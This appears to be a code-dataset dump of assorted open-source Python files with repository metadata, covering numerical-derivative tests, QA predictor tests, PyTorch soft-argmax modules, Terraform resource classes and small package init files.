src/hcb/codes/__init__.py
Strilanc/honeycomb-boundaries
cc33baac44c7831bd643db81d0053f8ec6eae9d8
[ "Apache-2.0" ]
null
null
null
src/hcb/codes/__init__.py
Strilanc/honeycomb-boundaries
cc33baac44c7831bd643db81d0053f8ec6eae9d8
[ "Apache-2.0" ]
2
2022-02-25T22:28:24.000Z
2022-03-23T21:09:04.000Z
src/hcb/codes/__init__.py
Strilanc/honeycomb-boundaries
cc33baac44c7831bd643db81d0053f8ec6eae9d8
[ "Apache-2.0" ]
null
null
null
from .surface.memory import generate_surface_code_memory_problem
32.5
64
0.907692
9
65
6.111111
0.777778
0
0
0
0
0
0
0
0
0
0
0
0.061538
65
1
65
65
0.901639
0
0
0
1
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
7693975e7da7cb504503c465610765fa117a5648
312
py
Python
egegl/models/expert/__init__.py
elix-tech/infrag
e5fa6b91659ed94e64ffbb3272b90fd3618e017e
[ "MIT" ]
1
2021-09-28T09:38:28.000Z
2021-09-28T09:38:28.000Z
egegl/models/expert/__init__.py
elix-tech/infrag
e5fa6b91659ed94e64ffbb3272b90fd3618e017e
[ "MIT" ]
null
null
null
egegl/models/expert/__init__.py
elix-tech/infrag
e5fa6b91659ed94e64ffbb3272b90fd3618e017e
[ "MIT" ]
1
2021-11-19T11:10:54.000Z
2021-11-19T11:10:54.000Z
""" Copyright (c) 2021 Elix, Inc. """ from .ge_operations.crossover import crossover from .ge_operations.fragment_crossover import fragment_crossover from .ge_operations.mutate import mutate from .ge_operations.selfies_crossover import selfies_crossover from .ge_operations.selfies_mutate import selfies_mutate
31.2
64
0.846154
41
312
6.170732
0.317073
0.118577
0.316206
0.296443
0
0
0
0
0
0
0
0.014085
0.089744
312
9
65
34.666667
0.876761
0.092949
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
76bd210d045e0384ae5c7884380d6166916aa290
274
py
Python
app/app/api/domain/services/factories/ExerciseEvaluationQueryRepositoryFactory.py
GPortas/Playgroundb
60f98a4dd62ce34fbb8abfa0d9ee63697e82c57e
[ "Apache-2.0" ]
1
2019-01-30T19:59:20.000Z
2019-01-30T19:59:20.000Z
app/app/api/domain/services/factories/ExerciseEvaluationQueryRepositoryFactory.py
GPortas/Playgroundb
60f98a4dd62ce34fbb8abfa0d9ee63697e82c57e
[ "Apache-2.0" ]
null
null
null
app/app/api/domain/services/factories/ExerciseEvaluationQueryRepositoryFactory.py
GPortas/Playgroundb
60f98a4dd62ce34fbb8abfa0d9ee63697e82c57e
[ "Apache-2.0" ]
null
null
null
from app.api.data.query.ExerciseEvaluationMongoQueryRepository import ExerciseEvaluationMongoQueryRepository class ExerciseEvaluationQueryRepositoryFactory: def create_exercise_evaluation_query_repository(self): return ExerciseEvaluationMongoQueryRepository()
39.142857
108
0.875912
19
274
12.421053
0.842105
0
0
0
0
0
0
0
0
0
0
0
0.087591
274
6
109
45.666667
0.944
0
0
0
0
0
0
0
0
0
0
0
0
1
0.25
false
0
0.25
0.25
1
0
1
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
96d6662a52f382a2dd59a78e81942445cbc71582
10,680
py
Python
tests/test_derivatives.py
MothVine/DESC
8f18ca63b34dad07ec67a4d43945d39287b303b8
[ "MIT" ]
9
2021-07-27T13:12:46.000Z
2022-03-30T12:28:07.000Z
tests/test_derivatives.py
MothVine/DESC
8f18ca63b34dad07ec67a4d43945d39287b303b8
[ "MIT" ]
97
2021-06-20T02:42:12.000Z
2022-03-29T20:54:14.000Z
tests/test_derivatives.py
MothVine/DESC
8f18ca63b34dad07ec67a4d43945d39287b303b8
[ "MIT" ]
3
2020-11-14T23:25:39.000Z
2021-05-13T20:05:36.000Z
import unittest import numpy as np from desc.backend import jnp from desc.derivatives import AutoDiffDerivative, FiniteDiffDerivative from numpy.random import default_rng class TestDerivative(unittest.TestCase): """Tests Grid classes""" def test_finite_diff_vec(self): def test_fun(x, y, a): return x * y + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac = FiniteDiffDerivative(test_fun, argnum=0) J = jac.compute(x, y, a) correct_J = np.diag(y) np.testing.assert_allclose(J, correct_J, atol=1e-8) def test_finite_diff_scalar(self): def test_fun(x, y, a): return np.dot(x, y) + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac = FiniteDiffDerivative(test_fun, argnum=0) J = jac.compute(x, y, a) correct_J = y np.testing.assert_allclose(J, correct_J, atol=1e-8) jac.argnum = 1 J = jac.compute(x, y, a) np.testing.assert_allclose(J, x, atol=1e-8) def test_auto_diff(self): def test_fun(x, y, a): return jnp.cos(x) + x * y + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac = AutoDiffDerivative(test_fun, argnum=0) J = jac.compute(x, y, a) correct_J = np.diag(-np.sin(x) + y) np.testing.assert_allclose(J, correct_J, atol=1e-8) def test_compare_AD_FD(self): def test_fun(x, y, a): return jnp.cos(x) + x * y + a x = np.array([1, 5, 0.01, 200]) y = np.array([60, 1, 100, 0.02]) a = -2 jac_AD = AutoDiffDerivative(test_fun, argnum=0) J_AD = jac_AD.compute(x, y, a) jac_FD = AutoDiffDerivative(test_fun, argnum=0) J_FD = jac_FD.compute(x, y, a) np.testing.assert_allclose(J_FD, J_AD, atol=1e-8) def test_fd_hessian(self): rando = default_rng(seed=0) n = 5 A = rando.random((n, n)) A = A + A.T g = rando.random(n) def f(x): return 5 + g.dot(x) + x.dot(1 / 2 * A.dot(x)) hess = FiniteDiffDerivative(f, argnum=0, mode="hess") y = rando.random(n) A1 = hess(y) np.testing.assert_allclose(A1, A) def test_block_jacobian(self): rando = default_rng(seed=0) A = rando.random((19, 17)) def fun(x): return jnp.dot(A, x) x = rando.random(17) jac = AutoDiffDerivative(fun, block_size=4, shape=A.shape) np.testing.assert_allclose(jac(x), A) jac = AutoDiffDerivative(fun, num_blocks=3, shape=A.shape) np.testing.assert_allclose(jac(x), A) class TestJVP(unittest.TestCase): @staticmethod def fun(x, c1, c2): Amat = np.arange(12).reshape((4, 3)) return jnp.dot(Amat, (x + c1 * c2) ** 3) x = np.ones(3).astype(float) c1 = np.arange(3).astype(float) c2 = np.arange(3).astype(float) + 2 dx = np.array([1, 2, 3]).astype(float) dc1 = np.array([3, 4, 5]).astype(float) dc2 = np.array([-3, 1, -2]).astype(float) def test_autodiff_jvp(self): df = AutoDiffDerivative.compute_jvp( self.fun, 0, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1554.0, 4038.0, 6522.0, 9006.0])) df = AutoDiffDerivative.compute_jvp( self.fun, 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([10296.0, 26658.0, 43020.0, 59382.0])) df = AutoDiffDerivative.compute_jvp( self.fun, (0, 2), (self.dx, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-342.0, -630.0, -918.0, -1206.0])) def test_finitediff_jvp(self): df = FiniteDiffDerivative.compute_jvp( self.fun, 0, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1554.0, 4038.0, 6522.0, 9006.0])) df = FiniteDiffDerivative.compute_jvp( self.fun, 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([10296.0, 26658.0, 43020.0, 59382.0])) df = FiniteDiffDerivative.compute_jvp( self.fun, (0, 2), (self.dx, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-342.0, -630.0, -918.0, -1206.0])) def test_autodiff_jvp2(self): df = AutoDiffDerivative.compute_jvp2( self.fun, 0, 0, self.dx + 1, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1440.0, 3852.0, 6264.0, 8676.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, 1, 1, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([56160.0, 147744.0, 239328.0, 330912.0]) ) df = AutoDiffDerivative.compute_jvp2( self.fun, 0, 2, self.dx, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-1248.0, -3048.0, -4848.0, -6648.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([5808.0, 15564.0, 25320.0, 35076.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose(df, np.array([22368.0, 63066.0, 103764.0, 144462.0])) df = AutoDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([5808.0, 15564.0, 25320.0, 35076.0])) def test_finitediff_jvp2(self): df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, 0, self.dx + 1, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([1440.0, 3852.0, 6264.0, 8676.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, 1, 1, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([56160.0, 147744.0, 239328.0, 330912.0]) ) df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, 2, self.dx, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([-1248.0, -3048.0, -4848.0, -6648.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([5808.0, 15564.0, 25320.0, 35076.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose(df, np.array([22368.0, 63066.0, 103764.0, 144462.0])) df = FiniteDiffDerivative.compute_jvp2( self.fun, 0, (1, 2), self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([5808.0, 15564.0, 25320.0, 35076.0])) def test_autodiff_jvp3(self): df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 0, 0, self.dx + 1, self.dx, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([504.0, 1404.0, 2304.0, 3204.0])) df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 1, 1, self.dx, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose(df, np.array([19440.0, 52704.0, 85968.0, 119232.0])) df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 1, 2, self.dx, self.dc1, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([-5784.0, -14118.0, -22452.0, -30786.0]) ) df = AutoDiffDerivative.compute_jvp3( self.fun, 0, 0, (1, 2), self.dx, self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose(df, np.array([2040.0, 5676.0, 9312.0, 12948.0])) df = AutoDiffDerivative.compute_jvp3( self.fun, (1, 2), (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose( df, np.array([-33858.0, -55584.0, -77310.0, -99036.0]) ) def test_finitediff_jvp3(self): df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 0, 0, self.dx + 1, self.dx, self.dx, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([504.0, 1404.0, 2304.0, 3204.0]), rtol=1e-4 ) df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 1, 1, self.dx, self.dc1 + 1, self.dc1, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([19440.0, 52704.0, 85968.0, 119232.0]), rtol=1e-4 ) df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 1, 2, self.dx, self.dc1, self.dc2, self.x, self.c1, self.c2 ) np.testing.assert_allclose( df, np.array([-5784.0, -14118.0, -22452.0, -30786.0]), rtol=1e-4 ) df = FiniteDiffDerivative.compute_jvp3( self.fun, 0, 0, (1, 2), self.dx, self.dx, (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose( df, np.array([2040.0, 5676.0, 9312.0, 12948.0]), rtol=1e-4 ) df = FiniteDiffDerivative.compute_jvp3( self.fun, (1, 2), (1, 2), (1, 2), (self.dc1, self.dc2), (self.dc1, self.dc2), (self.dc1, self.dc2), self.x, self.c1, self.c2, ) np.testing.assert_allclose( df, np.array([-33858.0, -55584.0, -77310.0, -99036.0]), rtol=1e-4 )
33.479624
88
0.533052
1,544
10,680
3.610104
0.100389
0.048977
0.096878
0.148547
0.839612
0.823107
0.798708
0.766416
0.726588
0.707212
0
0.134052
0.31339
10,680
318
89
33.584906
0.626074
0.001685
0
0.609665
0
0
0.000375
0
0
0
0
0
0.133829
1
0.070632
false
0
0.018587
0.022305
0.144981
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
96f0f997e8b1212818676f15e5230c53e58c694d
95
py
Python
katas/kyu_8/repeat_it.py
the-zebulan/CodeWars
1eafd1247d60955a5dfb63e4882e8ce86019f43a
[ "MIT" ]
40
2016-03-09T12:26:20.000Z
2022-03-23T08:44:51.000Z
katas/kyu_8/repeat_it.py
akalynych/CodeWars
1eafd1247d60955a5dfb63e4882e8ce86019f43a
[ "MIT" ]
null
null
null
katas/kyu_8/repeat_it.py
akalynych/CodeWars
1eafd1247d60955a5dfb63e4882e8ce86019f43a
[ "MIT" ]
36
2016-11-07T19:59:58.000Z
2022-03-31T11:18:27.000Z
def repeat_it(string, n): return string * n if isinstance(string, str) else 'Not a string'
31.666667
68
0.705263
16
95
4.125
0.75
0.212121
0
0
0
0
0
0
0
0
0
0
0.189474
95
2
69
47.5
0.857143
0
0
0
0
0
0.126316
0
0
0
0
0
0
1
0.5
false
0
0
0.5
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
6
96f8f7ef87c8b273a2348dc0c0fb934f9da2a82f
24
py
Python
hermes/language/__init__.py
dbracewell/pyHermes
09964eb566b74d1d3ae2b99849b06c4d07242e5b
[ "Apache-2.0" ]
null
null
null
hermes/language/__init__.py
dbracewell/pyHermes
09964eb566b74d1d3ae2b99849b06c4d07242e5b
[ "Apache-2.0" ]
null
null
null
hermes/language/__init__.py
dbracewell/pyHermes
09964eb566b74d1d3ae2b99849b06c4d07242e5b
[ "Apache-2.0" ]
null
null
null
from .language import *
12
23
0.75
3
24
6
1
0
0
0
0
0
0
0
0
0
0
0
0.166667
24
1
24
24
0.9
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8c2da4b5937893067dc0266b58695aed719a124a
444
py
Python
terrascript/nomad/r.py
hugovk/python-terrascript
08fe185904a70246822f5cfbdc9e64e9769ec494
[ "BSD-2-Clause" ]
null
null
null
terrascript/nomad/r.py
hugovk/python-terrascript
08fe185904a70246822f5cfbdc9e64e9769ec494
[ "BSD-2-Clause" ]
null
null
null
terrascript/nomad/r.py
hugovk/python-terrascript
08fe185904a70246822f5cfbdc9e64e9769ec494
[ "BSD-2-Clause" ]
null
null
null
# terrascript/nomad/r.py import terrascript class nomad_acl_policy(terrascript.Resource): pass class nomad_acl_token(terrascript.Resource): pass class nomad_job(terrascript.Resource): pass class nomad_namespace(terrascript.Resource): pass class nomad_quota_specification(terrascript.Resource): pass class nomad_sentinel_policy(terrascript.Resource): pass class nomad_volume(terrascript.Resource): pass
14.322581
54
0.777027
52
444
6.423077
0.326923
0.209581
0.482036
0.502994
0.628743
0.233533
0
0
0
0
0
0
0.150901
444
30
55
14.8
0.885942
0.04955
0
0.466667
0
0
0
0
0
0
0
0
0
1
0
true
0.466667
0.066667
0
0.533333
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
1
0
0
1
0
0
6
8c4194478f1bf43813dd29724c3eec4fe13d2aef
5,052
py
Python
tests/rc/predictors/dialog_qa_test.py
matt-peters/allennlp-models
cdd505ed539fdc2b82e4cc0a23eae4bfd3368e7e
[ "Apache-2.0" ]
402
2020-03-11T22:58:35.000Z
2022-03-29T09:05:27.000Z
tests/rc/predictors/dialog_qa_test.py
matt-peters/allennlp-models
cdd505ed539fdc2b82e4cc0a23eae4bfd3368e7e
[ "Apache-2.0" ]
116
2020-03-11T01:26:57.000Z
2022-03-25T13:03:56.000Z
tests/rc/predictors/dialog_qa_test.py
matt-peters/allennlp-models
cdd505ed539fdc2b82e4cc0a23eae4bfd3368e7e
[ "Apache-2.0" ]
140
2020-03-11T00:51:35.000Z
2022-03-29T09:05:36.000Z
from allennlp.models.archival import load_archive from allennlp.predictors import Predictor from tests import FIXTURES_ROOT class TestDialogQAPredictor: def test_uses_named_inputs(self): inputs = { "paragraphs": [ { "qas": [ { "followup": "y", "yesno": "x", "question": "When was the first one?", "answers": [{"answer_start": 0, "text": "One time"}], "id": "C_q#0", }, { "followup": "n", "yesno": "x", "question": "What were you doing?", "answers": [{"answer_start": 15, "text": "writing a"}], "id": "C_q#1", }, { "followup": "m", "yesno": "y", "question": "How often?", "answers": [{"answer_start": 4, "text": "time I"}], "id": "C_q#2", }, ], "context": "One time I was writing a unit test,\ and it succeeded on the first attempt.", } ] } archive = load_archive( FIXTURES_ROOT / "rc" / "dialog_qa" / "serialization" / "model.tar.gz" ) predictor = Predictor.from_archive(archive, "dialog_qa") result = predictor.predict_json(inputs) best_span_str_list = result.get("best_span_str") for best_span_str in best_span_str_list: assert isinstance(best_span_str, str) assert best_span_str != "" def test_batch_prediction(self): inputs = [ { "paragraphs": [ { "qas": [ { "followup": "y", "yesno": "x", "question": "When was the first one?", "answers": [{"answer_start": 0, "text": "One time"}], "id": "C_q#0", }, { "followup": "n", "yesno": "x", "question": "What were you doing?", "answers": [{"answer_start": 15, "text": "writing a"}], "id": "C_q#1", }, { "followup": "m", "yesno": "y", "question": "How often?", "answers": [{"answer_start": 4, "text": "time I"}], "id": "C_q#2", }, ], "context": "One time I was writing a unit test,\ and it succeeded on the first attempt.", } ] }, { "paragraphs": [ { "qas": [ { "followup": "y", "yesno": "x", "question": "When was the first one?", "answers": [{"answer_start": 0, "text": "One time"}], "id": "C_q#0", }, { "followup": "n", "yesno": "x", "question": "What were you doing?", "answers": [{"answer_start": 15, "text": "writing a"}], "id": "C_q#1", }, { "followup": "m", "yesno": "y", "question": "How often?", "answers": [{"answer_start": 4, "text": "time I"}], "id": "C_q#2", }, ], "context": "One time I was writing a unit test,\ and it succeeded on the first attempt.", } ] }, ] archive = load_archive( FIXTURES_ROOT / "rc" / "dialog_qa" / "serialization" / "model.tar.gz" ) predictor = Predictor.from_archive(archive, "dialog_qa") results = predictor.predict_batch_json(inputs) assert len(results) == 2
40.416
87
0.305819
344
5,052
4.340116
0.25
0.078366
0.108506
0.044206
0.747488
0.747488
0.747488
0.747488
0.747488
0.747488
0
0.010372
0.580166
5,052
124
88
40.741935
0.693541
0
0
0.568966
0
0
0.171813
0
0
0
0
0
0.025862
1
0.017241
false
0
0.025862
0
0.051724
0
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
4fce610faca889ec8646a95d9cbc176ef47a31e8
7,171
py
Python
pedrec/utils/torch_utils/torch_modules.py
noboevbo/PedRec
891d19bd6a2c7a7d71c2e41d37e7b4c4bfc7762e
[ "MIT" ]
1
2022-03-09T01:24:10.000Z
2022-03-09T01:24:10.000Z
pedrec/utils/torch_utils/torch_modules.py
noboevbo/PedRec
891d19bd6a2c7a7d71c2e41d37e7b4c4bfc7762e
[ "MIT" ]
null
null
null
pedrec/utils/torch_utils/torch_modules.py
noboevbo/PedRec
891d19bd6a2c7a7d71c2e41d37e7b4c4bfc7762e
[ "MIT" ]
null
null
null
from typing import Optional, Tuple import torch import torch.nn as nn import torch.nn.functional as F from pedrec.utils.torch_utils.torch_helper import create_meshgrid, create_linspace class DepthRegression(nn.Module): def __init__(self) -> None: super(DepthRegression, self).__init__() def forward(self, input: torch.Tensor, pose_heatmap: torch.Tensor) -> torch.Tensor: if not torch.is_tensor(input): raise TypeError("Input input type is not a torch.Tensor. Got {}" .format(type(input))) if not len(input.shape) == 4: raise ValueError("Invalid input shape, we expect BxCxHxW. Got: {}" .format(input.shape)) # unpack shapes and create view from input tensor batch_size, channels, height, width = input.shape x: torch.Tensor = input.view(batch_size, channels, -1) x_sigmoid: torch.Tensor = torch.sigmoid(x) result = torch.sum(x_sigmoid * pose_heatmap, -1, keepdim=True) return result class SoftArgmax1d(nn.Module): """ Soft Argmax 1D """ def __init__(self, norm_val = 1.0, normalized_coordinates: Optional[bool] = True) -> None: super(SoftArgmax1d, self).__init__() self.normalized_coordinates: Optional[bool] = normalized_coordinates self.norm_val = norm_val def forward(self, input: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: if not torch.is_tensor(input): raise TypeError("Input input type is not a torch.Tensor. Got {}" .format(type(input))) # if not len(input.shape) == 2: # raise ValueError("Invalid input shape, we expect BxCxHxW. Got: {}" # .format(input.shape)) # unpack shapes and create view from input tensor # x: torch.Tensor = input.view(batch_size, channels, -1) # input_a = input[0][0].detach().cpu().numpy() # # plt.imshow(input_a, cmap='hot', interpolation='nearest') # plt.show() # Softmax x_soft: torch.Tensor = F.softmax(input * self.norm_val, dim=-1) pos_x = create_linspace(input, self.normalized_coordinates) expected_x: torch.Tensor = torch.sum(pos_x * x_soft, -1, keepdim=True) return x_soft, expected_x # BxNx2 class SoftArgmax2d(nn.Module): r"""Creates a module that computes the Spatial Soft-Argmax 2D of a given input heatmap. Returns the index of the maximum 2d coordinates of the give map. The output order is x-coord and y-coord. Arguments: normalized_coordinates (Optional[bool]): wether to return the coordinates normalized in the range of [-1, 1]. Otherwise, it will return the coordinates in the range of the input shape. Default is True. Shape: - Input: :math:`(B, N, H, W)` - Output: :math:`(B, N, 2)` Examples:: >>> input = torch.rand(1, 4, 2, 3) >>> m = tgm.losses.SpatialSoftArgmax2d() >>> coords = m(input) # 1x4x2 >>> x_coord, y_coord = torch.chunk(coords, dim=-1, chunks=2) """ def __init__(self, norm_val: float = 1.0, normalized_coordinates: Optional[bool] = True) -> None: super(SoftArgmax2d, self).__init__() self.normalized_coordinates: Optional[bool] = normalized_coordinates self.norm_val = norm_val def forward(self, input: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: if not torch.is_tensor(input): raise TypeError("Input input type is not a torch.Tensor. Got {}" .format(type(input))) if not len(input.shape) == 4: raise ValueError("Invalid input shape, we expect BxCxHxW. Got: {}" .format(input.shape)) # unpack shapes and create view from input tensor batch_size, channels, height, width = input.shape x: torch.Tensor = input.view(batch_size, channels, -1) # input_a = input[0][0].detach().cpu().numpy() # # plt.imshow(input_a, cmap='hot', interpolation='nearest') # plt.show() # Softmax x_soft: torch.Tensor = F.softmax(x * self.norm_val, dim=-1) pos_y, pos_x = create_meshgrid(input, self.normalized_coordinates) pos_x = pos_x.reshape(-1) pos_y = pos_y.reshape(-1) expected_x: torch.Tensor = torch.sum(pos_x * x_soft, -1, keepdim=True) expected_y: torch.Tensor = torch.sum(pos_y * x_soft, -1, keepdim=True) output: torch.Tensor = torch.cat([expected_x, expected_y], dim=-1) return x_soft, output.view(batch_size, channels, 2) # BxNx2 class SpatialSoftArgmax2d(nn.Module): r"""Creates a module that computes the Spatial Soft-Argmax 2D of a given input heatmap. Returns the index of the maximum 2d coordinates of the give map. The output order is x-coord and y-coord. Arguments: normalized_coordinates (Optional[bool]): wether to return the coordinates normalized in the range of [-1, 1]. Otherwise, it will return the coordinates in the range of the input shape. Default is True. Shape: - Input: :math:`(B, N, H, W)` - Output: :math:`(B, N, 2)` Examples:: >>> input = torch.rand(1, 4, 2, 3) >>> m = tgm.losses.SpatialSoftArgmax2d() >>> coords = m(input) # 1x4x2 >>> x_coord, y_coord = torch.chunk(coords, dim=-1, chunks=2) """ def __init__(self, normalized_coordinates: Optional[bool] = True) -> None: super(SpatialSoftArgmax2d, self).__init__() self.normalized_coordinates: Optional[bool] = normalized_coordinates self.eps: float = 1e-6 def forward(self, input: torch.Tensor) -> torch.Tensor: if not torch.is_tensor(input): raise TypeError("Input input type is not a torch.Tensor. Got {}" .format(type(input))) if not len(input.shape) == 4: raise ValueError("Invalid input shape, we expect BxCxHxW. Got: {}" .format(input.shape)) # unpack shapes and create view from input tensor batch_size, channels, height, width = input.shape x: torch.Tensor = input.view(batch_size, channels, -1) # compute softmax with max substraction trick exp_x = torch.exp(x - torch.max(x, dim=-1, keepdim=True)[0]) exp_x_sum = 1.0 / (exp_x.sum(dim=-1, keepdim=True) + self.eps) # test = exp_x_sum.detach().cpu().numpy() # == probabilities # create coordinates grid pos_y, pos_x = create_meshgrid(input, self.normalized_coordinates) pos_x = pos_x.reshape(-1) pos_y = pos_y.reshape(-1) # compute the expected coordinates expected_y: torch.Tensor = torch.sum( (pos_y * exp_x) * exp_x_sum, dim=-1, keepdim=True) expected_x: torch.Tensor = torch.sum( (pos_x * exp_x) * exp_x_sum, dim=-1, keepdim=True) output: torch.Tensor = torch.cat([expected_x, expected_y], dim=-1) return output.view(batch_size, channels, 2) # BxNx2
40.514124
101
0.615395
942
7,171
4.543524
0.157113
0.074533
0.04486
0.061682
0.831075
0.824065
0.804907
0.773598
0.751168
0.719393
0
0.015059
0.268442
7,171
176
102
40.744318
0.800801
0.309441
0
0.536585
0
0
0.068234
0
0
0
0
0
0
1
0.097561
false
0
0.060976
0
0.256098
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
8c8ff2cb3f1da52d6fd59112f976e08f3bc1cb60
180
py
Python
rex_gym/__init__.py
franferri/rex-gym
f171a55732fd578180e14836cfd74deddcb55384
[ "Apache-2.0" ]
1
2020-03-09T07:03:39.000Z
2020-03-09T07:03:39.000Z
rex_gym/__init__.py
franferri/rex-gym
f171a55732fd578180e14836cfd74deddcb55384
[ "Apache-2.0" ]
null
null
null
rex_gym/__init__.py
franferri/rex-gym
f171a55732fd578180e14836cfd74deddcb55384
[ "Apache-2.0" ]
null
null
null
from rex_gym.agents import ppo, tools, scripts from rex_gym.envs import gym, rex_gym_env from rex_gym.model import motor, rex from rex_gym.util import pybullet_data, bullet_client
36
53
0.833333
33
180
4.30303
0.515152
0.211268
0.28169
0
0
0
0
0
0
0
0
0
0.116667
180
4
54
45
0.893082
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
8c96207504c3c45de6b356fed5ca0dbb16af90b9
9,198
py
Python
test/PR_test/unit_test/backend/test_percentile.py
DwijayDS/fastestimator
9b288cb2bd870f971ec4cee09d0b3205e1316a94
[ "Apache-2.0" ]
57
2019-05-21T21:29:26.000Z
2022-02-23T05:55:21.000Z
test/PR_test/unit_test/backend/test_percentile.py
vbvg2008/fastestimator
6061a4fbbeb62a2194ef82ba8017f651710d0c65
[ "Apache-2.0" ]
93
2019-05-23T18:36:07.000Z
2022-03-23T17:15:55.000Z
test/PR_test/unit_test/backend/test_percentile.py
vbvg2008/fastestimator
6061a4fbbeb62a2194ef82ba8017f651710d0c65
[ "Apache-2.0" ]
47
2019-05-09T15:41:37.000Z
2022-03-26T17:00:08.000Z
# Copyright 2020 The FastEstimator Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== import unittest import numpy as np import tensorflow as tf import torch import fastestimator as fe from fastestimator.test.unittest_util import is_equal class TestPercentile(unittest.TestCase): def test_percentile_tf_input_axis_none(self): with self.subTest("even_elements"): t = tf.constant([1, 2]) obj1 = fe.backend.percentile(t, percentiles=50) obj2 = tf.constant([1]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("two_dimensional"): t = tf.constant([[1, 3, 9], [2, 7, 5], [8, 4, 6]]) obj1 = fe.backend.percentile(t, percentiles=50) obj2 = tf.constant([[5]]) self.assertTrue(is_equal(obj1, obj2)) with self.subTest("multi_percentile"): 